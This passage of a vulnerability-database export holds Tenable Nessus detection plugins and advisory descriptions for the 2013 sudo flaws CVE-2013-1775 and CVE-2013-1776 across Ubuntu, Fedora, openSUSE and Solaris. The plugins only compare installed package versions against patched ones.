Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1754-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected sudo and / or sudo-ldap packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sudo-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/01\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.10|12\\.04|12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.10 / 12.04 / 12.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"sudo\", pkgver:\"1.6.9p10-1ubuntu3.10\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"sudo-ldap\", pkgver:\"1.6.9p10-1ubuntu3.10\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"sudo\", pkgver:\"1.7.2p1-1ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"sudo-ldap\", pkgver:\"1.7.2p1-1ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"sudo\", pkgver:\"1.7.4p6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"sudo-ldap\", pkgver:\"1.7.4p6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"sudo\", pkgver:\"1.8.3p1-1ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"sudo-ldap\", pkgver:\"1.8.3p1-1ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"sudo\", pkgver:\"1.8.5p2-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"sudo-ldap\", pkgver:\"1.8.5p2-1ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-ldap\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:44", "description": " - update to 1.8.6p7\n\n - fixes CVE-2013-1775 and CVE-2013-1776\n\n - fixed several packaging issues (thanks to ville.skytta\n at iki.fi)\n\n - build with system zlib.\n\n - let rpmbuild strip libexecdir/*.so.\n\n - own the %%{_docdir}/sudo-* dir.\n\n - fix some rpmlint warnings (spaces vs tabs, unescaped\n macros).\n\n - fix bogus 
%%changelog dates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-03-20T00:00:00", "title": "Fedora 17 : sudo-1.8.6p7-1.fc17 (2013-3270)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "modified": "2013-03-20T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:sudo"], "id": "FEDORA_2013-3270.NASL", "href": "https://www.tenable.com/plugins/nessus/65619", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3270.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65619);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n script_bugtraq_id(58203, 58207);\n script_xref(name:\"FEDORA\", value:\"2013-3270\");\n\n script_name(english:\"Fedora 17 : sudo-1.8.6p7-1.fc17 (2013-3270)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - update to 1.8.6p7\n\n - fixes CVE-2013-1775 and CVE-2013-1776\n\n - fixed several packaging issues (thanks to ville.skytta\n at iki.fi)\n\n - build with system zlib.\n\n - let rpmbuild strip libexecdir/*.so.\n\n - own the %%{_docdir}/sudo-* dir.\n\n - fix some rpmlint warnings (spaces vs tabs, unescaped\n macros).\n\n - fix bogus %%changelog dates.\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916365\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-March/100498.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?455f1f89\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"sudo-1.8.6p7-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:44", "description": " - update to 1.8.6p7\n\n - fixes CVE-2013-1775 and CVE-2013-1776\n\n - fixed several packaging issues (thanks to ville.skytta\n at iki.fi)\n\n - build with system zlib.\n\n - let rpmbuild strip libexecdir/*.so.\n\n - own the %%{_docdir}/sudo-* dir.\n\n - fix some rpmlint warnings (spaces vs tabs, unescaped\n macros).\n\n - fix bogus %%changelog dates.\n\nNote that Tenable Network 
Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-03-17T00:00:00", "title": "Fedora 18 : sudo-1.8.6p7-1.fc18 (2013-3297)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "modified": "2013-03-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:sudo"], "id": "FEDORA_2013-3297.NASL", "href": "https://www.tenable.com/plugins/nessus/65590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3297.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65590);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n script_bugtraq_id(58203, 58207);\n script_xref(name:\"FEDORA\", value:\"2013-3297\");\n\n script_name(english:\"Fedora 18 : sudo-1.8.6p7-1.fc18 (2013-3297)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - update to 1.8.6p7\n\n - fixes CVE-2013-1775 and CVE-2013-1776\n\n - fixed several packaging issues (thanks to ville.skytta\n at iki.fi)\n\n - build with system zlib.\n\n - let rpmbuild strip libexecdir/*.so.\n\n - own the %%{_docdir}/sudo-* dir.\n\n - fix some rpmlint warnings (spaces vs tabs, unescaped\n macros).\n\n - fix bogus %%changelog dates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora 
security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916365\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-March/100157.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f54496bd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"sudo-1.8.6p7-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:09", "description": "sudo was updated to fix two security issues, where adjusting the time\nof the system could be used to regain access to sudo sessions if they\nonce were granted. 
(CVE-2013-1775,CVE-2013-1776)", "edition": 17, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : sudo (openSUSE-SU-2013:0495-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:sudo-debuginfo", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:sudo-devel", "p-cpe:/a:novell:opensuse:sudo", "p-cpe:/a:novell:opensuse:sudo-debugsource", "cpe:/o:novell:opensuse:12.2"], "id": "OPENSUSE-2013-221.NASL", "href": "https://www.tenable.com/plugins/nessus/74928", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-221.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74928);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n\n script_name(english:\"openSUSE Security Update : sudo (openSUSE-SU-2013:0495-1)\");\n script_summary(english:\"Check for the openSUSE-2013-221 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"sudo was updated to fix two security issues, where adjusting the time\nof the syste could be used to regain access to sudo sessions if they\nonc were granted. 
(CVE-2013-1775,CVE-2013-1776)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-03/msg00066.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1|SUSE12\\.2|SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1 / 12.2 / 12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-1.8.2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-debuginfo-1.8.2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-debugsource-1.8.2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-devel-1.8.2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"sudo-1.8.5p2-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"sudo-debuginfo-1.8.5p2-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"sudo-debugsource-1.8.5p2-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"sudo-devel-1.8.5p2-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"sudo-1.8.6p3-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"sudo-debuginfo-1.8.6p3-3.5.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.3\", reference:\"sudo-debugsource-1.8.6p3-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"sudo-devel-1.8.6p3-3.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:49:20", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through\n 1.8.6p6 allows local users or physically proximate\n attackers to bypass intended time restrictions and\n retain privileges without re-authenticating by setting\n the system clock and sudo user timestamp to the epoch.\n (CVE-2013-1775)\n\n - sudo 1.3.5 through 1.7.10 and 1.8.0 through 1.8.5, when\n the tty_tickets option is enabled, does not properly\n validate the controlling terminal device, which allows\n local users with sudo permissions to hijack the\n authorization of another terminal via vectors related to\n connecting to the standard input, output, and error file\n descriptors of another terminal. 
NOTE: this is one of\n three closely-related vulnerabilities that were\n originally assigned CVE-2013-1776, but they have been\n SPLIT because of different affected versions.\n (CVE-2013-1776)", "edition": 23, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : sudo (multiple_permissions_privileges_and_access)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1", "p-cpe:/a:oracle:solaris:sudo"], "id": "SOLARIS11_SUDO_20130611.NASL", "href": "https://www.tenable.com/plugins/nessus/80779", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80779);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : sudo (multiple_permissions_privileges_and_access)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through\n 1.8.6p6 allows local users or physically proximate\n attackers to bypass intended time restrictions and\n retain privileges without re-authenticating by setting\n the system clock and sudo user timestamp to the epoch.\n (CVE-2013-1775)\n\n - sudo 1.3.5 through 1.7.10 and 1.8.0 through 1.8.5, when\n the tty_tickets option is enabled, does not properly\n validate the controlling terminal device, which allows\n local 
users with sudo permissions to hijack the\n authorization of another terminal via vectors related to\n connecting to the standard input, output, and error file\n descriptors of another terminal. NOTE: this is one of\n three closely-related vulnerabilities that were\n originally assigned CVE-2013-1776, but they have been\n SPLIT because of different affected versions.\n (CVE-2013-1776)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/multiple-permissions,-privileges,-and-access-control-vulnerabilities-in-sudo\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a9758ddf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.7.5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:sudo\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 
Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^sudo$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.7.0.5.0\", sru:\"SRU 11.1.7.5.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : sudo\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if 